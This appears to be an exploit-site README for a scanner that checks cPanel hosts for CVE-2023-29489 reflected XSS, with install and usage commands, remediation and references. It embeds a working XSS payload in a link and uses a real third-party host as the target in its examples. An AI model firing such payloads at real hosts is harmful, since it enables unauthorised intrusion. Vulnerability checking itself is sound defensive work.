## https://sploitus.com/exploit?id=A9B2E12E-7C0B-5943-9D14-7C26EE00669F
# cpanel_29489 Tool
## Overview
The cpanel_29489 tool checks whether a cPanel host is affected by CVE-2023-29489, a reflected Cross-Site Scripting (XSS) vulnerability in the error page served by cpsrvd. It lets security professionals test whether a given URL reflects an injected payload back unescaped, and it supports custom payload lists and batch testing of several targets.
## Bug Details
- **CVE ID:** CVE-2023-29489
- **Bug Name:** Reflected XSS (R-XSS)
- **Bug Priority:** Medium
- **Vulnerable URL:** [http://private-wireless-rom.ext.net.nokia.com/cpanelwebcall/](http://private-wireless-rom.ext.net.nokia.com/cpanelwebcall/%3Cimg%20src=x%20onerror=%22prompt%28'karthithehacker'%29%22%3Eaaaaaaaaaaaa)
- **CVE Description:** An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.
## Tool Usage
### Installation
```bash
pip install -i https://test.pypi.org/simple/ cpanel-29489
```
### Command Line Options
- `-u` or `--url`: Specify the target URL.
- `-o` or `--output`: Specify the output file to store the results.
- `-p` or `--payload`: Specify the path (or, as in the example below, the URL) of a file containing custom XSS payloads, one per line.
- `-i` or `--input`: Specify the path to a file containing a list of URLs to test.
### Examples
1. Basic usage with default payload:
```bash
cpanel_29489 -u http://private-wireless-rom.ext.net.nokia.com/ -o output.txt
```
2. Using custom payload file:
```bash
cpanel_29489 -u http://private-wireless-rom.ext.net.nokia.com/ -o output.txt -p https://raw.githubusercontent.com/Praveenms13/CVE-2023-29489/main/xss-payload.txt
```
3. Batch testing from an input file:
```bash
cpanel_29489 -i /path/to/input.txt -o output.txt
```
## Output
The tool writes a report listing each URL found to be vulnerable together with the payload that was reflected on its cpsrvd error page.
## Impact
The impact of an XSS attack depends on the application. It ranges from minimal in public, anonymous applications to serious or critical in applications holding sensitive data or privileged access. Here the payload runs in the origin of the cPanel service itself, so an authenticated user who follows a crafted link can have that session abused by the injected script.
## Remediation
To mitigate the vulnerability, upgrade to a cPanel build that contains the fix for CVE-2023-29489: the CVE entry names 11.109.9999.116 as the first fixed version, and cPanel's TSR-2023-0001 disclosure (see References) lists the patched builds for each supported branch. Re-run the check after upgrading to confirm the error page no longer reflects the payload unescaped.
## References
- [Assetnote Blog](https://blog.assetnote.io/2023/04/26/xss-million-websites-cpanel/)
- [NIST CVE Details](https://nvd.nist.gov/vuln/detail/CVE-2023-29489)
- [cPanel Forums](https://forums.cpanel.net/threads/cpanel-tsr-2023-0001-full-disclosure.708949/)
## Contact
- **POC by:** [@karthithehacker](https://twitter.com/karthithehacker)
- **Mail:** [contact@karthithehacker.com](mailto:contact@karthithehacker.com)
- **Website:** [Karthithehacker.com](https://karthithehacker.com)
## Disclaimer
This tool is developed for educational and testing purposes. Use it responsibly and ensure you have proper authorization before testing any system.
---